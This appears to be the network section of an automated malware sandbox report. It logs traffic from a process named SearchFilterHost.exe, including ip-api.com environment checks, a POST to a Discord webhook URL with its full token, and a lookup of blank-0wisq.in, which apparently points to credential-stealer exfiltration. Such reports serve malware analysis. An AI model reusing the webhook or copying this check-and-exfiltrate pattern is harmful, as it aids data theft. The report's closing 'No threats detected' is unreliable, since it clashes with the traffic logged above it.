SearchFilterHost.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
GET
204
142.250.186.163:443
https://gstatic.com/generate_204
unknown
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
POST
404
162.159.138.232:443
https://discordapp.com/api/webhooks/1309199814961139873/mg7Bd7rhIarDojHEmyE0WAKDp4Pm312qQ_Rwx9VjuJMBIm3VU8mfVcLRPZQJi1Fg6l3Y
unknown
binary
45 b
whitelisted
6524
SearchFilterHost.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.28
  • 23.216.77.42
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
blank-0wisq.in
unknown
ip-api.com
  • 208.95.112.1
whitelisted
gstatic.com
  • 142.250.186.35
whitelisted
discordapp.com
  • 162.159.130.233
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.129.233
  • 162.159.133.233
whitelisted
self.events.data.microsoft.com
  • 20.189.173.9
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

No threats detected
No debug info